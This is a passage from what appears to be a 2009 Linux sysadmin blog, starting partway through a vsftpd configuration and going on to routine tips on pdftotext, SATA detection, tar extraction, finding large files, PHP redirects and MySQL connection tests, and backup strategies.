# users to NOT chroot().
#chroot_list_enable=YES
# (default follows)
#chroot_list_file=/etc/vsftpd/chroot_list

### Added April 14 2009: jail each user into their specified directory ###
chroot_local_user=YES
user_config_dir=/etc/vsftpd/vsftpd_user_conf
#
# You may activate the "-R" option to the builtin ls. This is disabled by
# default to avoid remote users being able to cause excessive I/O on large
# sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
# the presence of the "-R" option, so there is a strong case for enabling it.
#ls_recurse_enable=YES
#
# When "listen" directive is enabled, vsftpd runs in standalone mode and
# listens on IPv4 sockets. This directive cannot be used in conjunction
# with the listen_ipv6 directive.
listen=YES
#
# This directive enables listening on IPv6 sockets. To listen on IPv4 and IPv6
# sockets, you must run two copies of vsftpd with two configuration files.
# Make sure that one of the listen options is commented out!
#listen_ipv6=YES

pam_service_name=vsftpd
userlist_enable=YES
tcp_wrappers=YES


#### This function enables passive mode
pasv_enable=YES
# This function limits the passive mode range to TCP ports 60000 through 60040
pasv_min_port=60000
pasv_max_port=60040
#port_enable=YES

###TLS Support###
ssl_enable=YES
allow_anon_ssl=NO
force_local_data_ssl=NO
#force_local_logins_ssl=YES
force_local_logins_ssl=NO
ssl_tlsv1=YES
ssl_sslv2=NO
ssl_sslv3=NO
rsa_cert_file=/etc/vsftpd/vsftpd.pem


### Performance ###
# Specifies the maximum number of clients allowed to connect from the same source IP address.
max_per_ip=3
# Specifies the maximum number of simultaneous clients allowed to connect to the
# server when it is running in standalone mode.
max_clients=50
# Specifies the maximum rate at which data is transferred for local users logged
# into the server, in bytes per second (0 means no limit).
local_max_rate=0
# Specifies the maximum amount of time between commands from a remote client
# (note: this overrides the idle_session_timeout value set earlier in this file).
idle_session_timeout=400
# Specifies the maximum amount of time a client using active mode has to respond to
# a data connection, in seconds.
connect_timeout=60



[root@home vsftpd]# iptables -L -n
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:21
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:20
ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpts:60000:60040


[root@home log]# cat /etc/vsftpd/vsftpd_user_conf/user101
dirlist_enable=YES
local_root=/var/www/html/home.example.net/html/site1/
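To jail an additional user the same way, drop another file named after the login into user_config_dir (user102 and the local_root path below are placeholders; adjust them for your setup):
# mkdir -p /etc/vsftpd/vsftpd_user_conf
# cat > /etc/vsftpd/vsftpd_user_conf/user102 <<'EOF'
dirlist_enable=YES
local_root=/var/www/html/site2/
EOF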

pdftotext: Linux / UNIX Convert a PDF File To Text Format

SkyHi @ Thursday, August 20, 2009
Question: I've downloaded configuration file in a PDF format. I do not have GUI installed on remote Linux / UNIX server. How do I convert a PDF (Portable Document Format) file to a text format using command line so that I can view file over remote ssh session?

Answer: Use the pdftotext utility to convert Portable Document Format (PDF) files to plain text. It reads the PDF file and writes a text file. If the text file is not specified, pdftotext converts file.pdf to file.txt. If the text file is -, the text is sent to stdout.

Install pdftotext under RedHat / RHEL / Fedora / CentOS Linux

pdftotext is provided by the poppler-utils package on various Linux distributions:
# yum install poppler-utils
OR use the following under Debian / Ubuntu Linux
$ sudo apt-get install poppler-utils

pdftotext syntax

pdftotext {PDF-file} {text-file}

How do I convert a pdf to text?

Convert a pdf file called hp-manual.pdf to hp-manual.txt, enter:
$ pdftotext hp-manual.pdf hp-manual.txt

To convert only pages 5 through 10, specify the first page with -f and the last page with -l:
$ pdftotext -f 5 -l 10 hp-manual.pdf hp-manual.txt

Convert a pdf file protected and encrypted by owner password:
$ pdftotext -opw 'password' hp-manual.pdf hp-manual.txt

Convert a pdf file protected and encrypted by user password:
$ pdftotext -upw 'password' hp-manual.pdf hp-manual.txt

The -eol option sets the end-of-line convention to use for text output; you can set it to unix, dos or mac. For UNIX / Linux systems, enter:
$ pdftotext -eol unix hp-manual.pdf hp-manual.txt
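To convert every PDF in the current directory in one go (each file.pdf becomes file.txt, per the default behaviour described above), a simple shell loop works:
$ for f in *.pdf; do pdftotext "$f"; done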

Further reading:

  • pdftotext man page
REFERENCES
http://www.cyberciti.biz/faq/converter-pdf-files-to-text-format-command/

error: hde: attached ide-disk driver

SkyHi @ Thursday, August 20, 2009
Well, I fixed it. I just went into the BIOS and changed the IDE mode to Compatibility instead of Enhanced, and I've got SuSE 9.0 installed and working now. The only problem I have now is that I can't get the PPP module installed correctly. Using YaST2 I installed the module, and it is residing in the /etc/ folder. But when I click Kinternet to connect, the log file says it can't find the PPP module, and when I type ppp into the Konsole, it says the kernel doesn't have PPP support... Do I need to recompile the kernel with the PPP module, and if so, how do I do that? Thanks

Reference: http://www.linuxquestions.org/questions/linux-hardware-18/suse-linux-hde-attached-ide-disk-driver-freeze-111048/

Linux SATA Drive is Being Displayed as /dev/hda Instead Of /dev/sda

SkyHi @ Thursday, August 20, 2009
Q. My SATA drive is being displayed as /dev/hda instead of /dev/sda. How do I fix this problem and make sure I get /dev/sda and speed of SATA under Linux operating systems?

A. This is usually related to BIOS settings. Reboot your system and enter into BIOS setup:
Check BIOS settings

Make sure Parallel ATA is "Enabled"

Make sure "Native Mode Operation" is set to "Serial ATA"

Also, set SATA Controller Mode option to "Enhanced"

Save the changes and reboot the server. Linux should now detect the SATA drive as /dev/sda instead of /dev/hda.
Make sure kernel is compiled with SATA support

Vendor kernels from Debian / RHEL / Red Hat / Fedora usually come with SATA support enabled. However, you may have compiled a custom kernel. If this is the case, run the following command to find out whether SATA kernel support is compiled in:
grep -i SATA /boot/config-$(uname -r)
Sample output:

CONFIG_SATA_AHCI=m
CONFIG_SATA_INIC162X=m
CONFIG_SATA_MV=m
CONFIG_SATA_NV=m
CONFIG_SATA_PMP=y
CONFIG_SATA_PROMISE=m
CONFIG_SATA_QSTOR=m
CONFIG_SATA_SIL=m
CONFIG_SATA_SIL24=m
CONFIG_SATA_SIS=m
CONFIG_SATA_SVW=m
CONFIG_SATA_SX4=m
CONFIG_SATA_ULI=m
CONFIG_SATA_VIA=m
CONFIG_SATA_VITESSE=m

Make sure the ata_piix and libata drivers are loaded and that the disk shows up as /dev/sda:
lsmod | egrep 'ata_piix|libata'
Sample output:

ata_piix 24580 5
libata 177312 5 pata_acpi,ata_generic,pata_marvell,ata_piix,ahci
scsi_mod 155212 9 ib_iser,iscsi_tcp,libiscsi,scsi_transport_iscsi,sbp2,sr_mod,sd_mod,sg,libata
dock 16656 1 libata
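As a final check, the kernel ring buffer usually records the negotiated SATA link speed (the exact wording varies by kernel version):
$ dmesg | grep -i 'sata link'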


Reference: http://www.cyberciti.biz/faq/linux-sata-drive-displayed-as-devhda/

VSFTPD: Force Upload Only No Downloads

SkyHi @ Thursday, August 20, 2009
Question: How do I configure my VSFTPD ftp server to upload files but disable all file download requests under Debian Linux?

Answer: You can easily configure vsftpd to disallow all download requests using the download_enable option.
VSFTPD ftp server download_enable option

If set to NO, all download requests will give permission denied.
Configure vsftpd to disallow all download requests

Open vsftpd.conf file:
# vi /etc/vsftpd.conf
Set download_enable to NO:
download_enable=NO
Save and close the file. Restart vsftpd ftp server:
# /etc/init.d/vsftpd restart
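If you prefer a one-liner that only appends the option when it is not already present (a small sketch; adjust the config path for your distribution):
# grep -q '^download_enable' /etc/vsftpd.conf || echo 'download_enable=NO' >> /etc/vsftpd.conf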

Tar Extract a Single File(s) From a Large Tarball

SkyHi @ Thursday, August 20, 2009
Q. I have a couple of large tarballs such as www.tar and images.tar. Is it possible to extract a single file or a list of files from a large tarball such as images.tar instead of extracting the entire tarball? How do I extract specific files under Linux / UNIX operating systems?

A. GNU tar can be used to extract one or more files from a tarball. To extract specific archive members, give their exact member names as arguments, as printed by the -t option.
Extracting Specific Files

Extract a file called etc/default/sysstat from the config.tar.gz tarball (the first command lists the archive contents so you can confirm the exact member name):
$ tar -ztvf config.tar.gz
$ tar -zxvf config.tar.gz etc/default/sysstat
The general syntax is:
$ tar -xvf {tarball.tar} {path/to/file}
Some people prefer the following syntax:
tar --extract --file={tarball.tar} {file}
Extract a directory called css from cbz.tar:
$ tar --extract --file=cbz.tar css
Wildcard based extracting

You can also extract those files that match a specific globbing pattern (wildcards). For example, to extract from cbz.tar all files that begin with pic, no matter their directory prefix, you could type:
$ tar -xf cbz.tar --wildcards --no-anchored 'pic*'
To extract all php files, enter:
$ tar -xf cbz.tar --wildcards --no-anchored '*.php'

Where,

* -x: instructs tar to extract files.
* -f: specifies the filename / tarball name.
* -v: verbose (show progress while extracting files).
* -j: filter the archive through bzip2; use to decompress .bz2 files.
* -z: filter the archive through gzip; use to decompress .gz files.
* --wildcards: instructs tar to treat command-line arguments as globbing patterns.
* --no-anchored: informs tar that the patterns apply to member names after any / delimiter.
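If you have many files to pull out, GNU tar can also read member names from a file with the -T (--files-from) option; filelist.txt here is a placeholder for a file containing one member name per line:
$ tar -xvf cbz.tar -T filelist.txt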


Reference: http://www.cyberciti.biz/faq/linux-unix-extracting-specific-files/

Linux Find Large Files and sort du -h output by size

SkyHi @ Thursday, August 20, 2009
Q. How do I find out all large files in a directory?

A. There is no single command that can be used to list all large files. But, with the help of the find command and shell pipes, you can easily list all large files.

Linux List All Large Files

To find all files over 50,000KB (50MB+) in size and display their names along with their sizes, use the following syntax:

Syntax for RedHat / CentOS / Fedora Linux

find {/path/to/directory/} -type f -size +{size-in-kb}k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }' 

Search or find big files Linux (50MB) in current directory, enter:
$ find . -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }' 

Search in my /var/log directory:
# find /var/log -type f -size +100000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'

Syntax for Debian / Ubuntu Linux

find {/path/to/directory} -type f -size +{file-size-in-kb}k -exec ls -lh {} \; | awk '{ print $8 ": " $5 }' 

Search in current directory:
$ find . -type f -size +10000k -exec ls -lh {} \; | awk '{ print $8 ": " $5 }'

Sample output:
./.kde/share/apps/akregator/Archive/http___blogs.msdn.com_MainFeed.aspx?Type=AllBlogs.mk4: 91M
./out/out.tar.gz: 828M
./.cache/tracker/file-meta.db: 101M
./ubuntu-8.04-desktop-i386.iso: 700M
./vivek/out/mp3/Eric: 230M
 
The above commands list files that are greater than 10,000 kilobytes in size. To list all files in your home directory tree less than 500 bytes in size, type:
$ find $HOME -size -500b
OR
$ find ~ -size -500b 

To list all files on the system whose size is exactly 20 512-byte blocks, type:
# find / -size 20

ls command: finding the largest files in a directory

You can also use ls command:
$ ls -lS
$ ls -lS | less
$ ls -lS | head -10

ls command: finding the smallest files in a directory

Use ls command as follows:
$ ls -lSr
$ ls -lSr | less
$ ls -lSr | tail -10

You can also use the du command, as pointed out by georges in the comments.


Perl hack: To display large files

Jonathan has contributed the following perl code; it prints a row of stars for each folder / file, and the length of the row shows the relative usage, from smallest to largest on the box:

#du -k | sort -n | perl -ne 'if ( /^(\d+)\s+(.*$)/){$l=log($1+.1);$m=int($l/log(1024)); printf  ("%6.1f\t%s\t%25s  %s\n",($1/(2**(10*$m))),(("K","M","G","T","P")[$m]),"*"x (1.5*$l),$2);}'




996.0 K ********** ./3dgolddenhouse.com/html/gallery/wood_b_slides
1.0 M ********** ./3dgolddenhouse.com/html/gallery/draperies_slides
1.1 M ********** ./3dgolddenhouse.com/html/gallery/roller_shades_slide
1.1 M ********** ./3dgolddenhouse.com/html/gallery/wood_shutters_slides
1.2 M ********** ./stellmnao.com/html/cchis
1.2 M ********** ./stellmnao.com/html
1.2 M ********** ./stellmnao.com
1.3 M ********** ./3dgolddenhouse.com/html/gallery/cellular_slides
1.3 M ********** ./3dgolddenhouse.com/html/gallery/faux_wood_slides
1.3 M ********** ./heretogohome.net/html/bo/app/webroot
1.5 M ********** ./3dgolddenhouse.com/html/gallery/sheer_shades_slides
1.6 M *********** ./3dgolddenhouse.com/html/gallery/vinyl_shutters_slides
1.7 M *********** ./heretogohome.net/html/bo/cake/libs
1.9 M *********** ./heretogohome.net/html/bo/app
2.8 M *********** ./heretogohome.net/html/bo/cake
3.1 M ************ ./3dgolddenhouse.com/html/images
3.1 M ************ ./3dgolddenhouse.com/html/gallery/aluminum_slides
3.2 M ************ ./3dgolddenhouse.com/html/gallery/roman_shades_slides
5.3 M ************ ./heretogohome.net/html/bo
5.3 M ************ ./heretogohome.net/html
5.3 M ************ ./heretogohome.net
18.0 M ************** ./3dgolddenhouse.com/html/gallery
21.3 M ************** ./3dgolddenhouse.com/html
21.3 M ************** ./3dgolddenhouse.com
27.8 M *************** .

Linux tip: du --max-depth=1
du --max-depth=1 | sort -n | awk 'BEGIN {OFMT = "%.0f"} {print $1/1024,"MB", $2}' > diskusage.txt
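With GNU coreutils 7.5 or later, sort understands human-readable sizes directly via -h, which avoids the unit conversion entirely:
$ du -h --max-depth=1 | sort -h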




Reference: http://www.cyberciti.biz/faq/find-large-files-linux/
http://serverfault.com/questions/62411/how-can-i-sort-du-h-output-by-size

Domain Redirection Using a PHP Script

SkyHi @ Thursday, August 20, 2009
Q. How do I redirect my domain name using a php server side scripting under Apache web server?

A. Under PHP you need to use header() to send a raw HTTP header. Note that header() must be called before any actual output is sent to the browser.

If you want to redirect a domain to some other URL, you can use a PHP script like the one below:

<?php
header("Location: http://example.com/");
exit();
?>

PHP Test mysql connection

SkyHi @ Thursday, August 20, 2009

<?php
// Connection settings
$hostname = "db2.example.com";
$user     = "user";
$password = "password";

// Connect to the MySQL server
$link = mysql_connect($hostname, $user, $password);
if (!$link) {
    die('Could not connect to MySQL: ' . mysql_error());
}
echo 'Connection OK';

// Select the database
$dbname = "dbai";
$selected = mysql_select_db($dbname, $link) or die("Could not open db: " . mysql_error());

// Close the connection
mysql_close($link);
?>

Incremental vs Differential Backups. What's the strategic difference?

SkyHi @ Thursday, August 20, 2009
Incremental backups reset the archive bit and differential backups do not.

I use a differential backup when installing something that is complex and multi-step. I can create a differential backup after each step and essentially save my work up to that point. If anything goes horribly wrong, I can restore up to the last working step and not have my changes skipped by my regular incremental backup after I am finished.



The main benefit of a differential is that you only need the last differential and the last full backup to recover all of your data in the event of a loss.

If you use incremental backups, each run is a lot quicker because it only backs up changes since the last incremental; a differential backs up everything that has changed since the last full backup, so differentials are larger.

So say you lost all your data: if you used incremental backups, you would need to restore the last full backup and every incremental backup since then.

If you used differential, you would restore the last full backup and the last differential backup.

It all depends on how much storage and how much time you have to do the backups.

Hope this helps.

Andy


Reference: http://community.spiceworks.com/topic/30516

What's the difference between differential and incremental backups (and why should I care)?

Both differential and incremental backups are "smart" backups that save time and disk space by only backing up changed files. But they differ significantly in how they do it, and how useful the result is.

A full backup created from within Windows, of course, backs up all the files in a partition or on a disk by copying all disk sectors with data to the backup image file. (When creating a full backup of an unknown or damaged filesystem, Acronis True Image copies all sectors to the image file, whether or not a sector contains data.) This is the simplest form of backup, but it is also the most time-consuming, space-intensive and the least flexible.

Typically full backups are only done once a week and are part of an overall backup plan. Sometimes a full backup is done after a major change of the data on the disk, such as an operating system upgrade or software install. The relatively long intervals between backups mean that if something goes wrong, a lot of data is going to be lost. That's why it is wise to back up data between full backups.

Most of the information on a computer changes very slowly or not at all. This includes the applications themselves, the operating system and even most of the user data. Typically, only a small percentage of the information in a partition or disk changes on a daily, or even a weekly, basis. For that reason, it makes sense only to back up the data that has changed on a daily basis. This is the basis of sophisticated backup strategies.

Differential backups were the next step in the evolution of backup strategies. A differential backup backs up only the files that changed since the last full backup. For example, suppose you do a full backup on Sunday. On Monday you back up only the files that changed since Sunday, on Tuesday you again back up only the files that changed since Sunday, and so on until the next full backup. Differential backups are quicker than full backups because so much less data is being backed up. But the amount of data being backed up grows with each differential backup until the next full backup. Differential backups are more flexible than full backups, but still unwieldy to do more than about once a day, especially as the next full backup approaches.

Incremental backups also back up only the changed data, but they only back up the data that has changed since the last backup — be it a full or incremental backup. They are sometimes called "differential incremental backups," while differential backups are sometimes called "cumulative incremental backups." Confused yet? Don't be.

If you do an incremental backup on Tuesday, you only back up the data that changed since the incremental backup on Monday. The result is a much smaller, faster backup. The characteristic of incremental backups is the shorter the time interval between backups, the less data to be backed up. In fact, with sophisticated backup software like Acronis True Image, the backups are so small and so fast you can actually back up every hour, or even more frequently, depending on the work you're doing and how important it is to have current backups.

While incremental backups give much greater flexibility and granularity (time between backups), they have the reputation for taking longer to restore because the backup has to be reconstituted from the last full backup and all the incremental backups since. Acronis True Image uses special snapshot technology to rebuild the full image quickly for restoration. This makes incremental backups much more practical for the average enterprise.
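On Linux you can implement both strategies with GNU tar's --listed-incremental snapshot files; here is a minimal sketch (the archive names and /data are placeholders):

# Full backup; tar records the state of every file in the snapshot file:
tar -czf full.tar.gz --listed-incremental=state.snar /data
cp state.snar state-at-full.snar   # keep a pristine copy for differentials
# Incremental: reuse state.snar, which tar updates on every run, so each
# archive holds only the changes since the previous backup:
tar -czf incr-$(date +%F).tar.gz --listed-incremental=state.snar /data
# Differential: start each run from the snapshot taken at the full backup,
# so each archive holds all changes since the full backup:
cp state-at-full.snar state-diff.snar
tar -czf diff-$(date +%F).tar.gz --listed-incremental=state-diff.snar /data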

Reference: http://www.acronis.com/resource/solutions/backup/2005/incremental-backups.html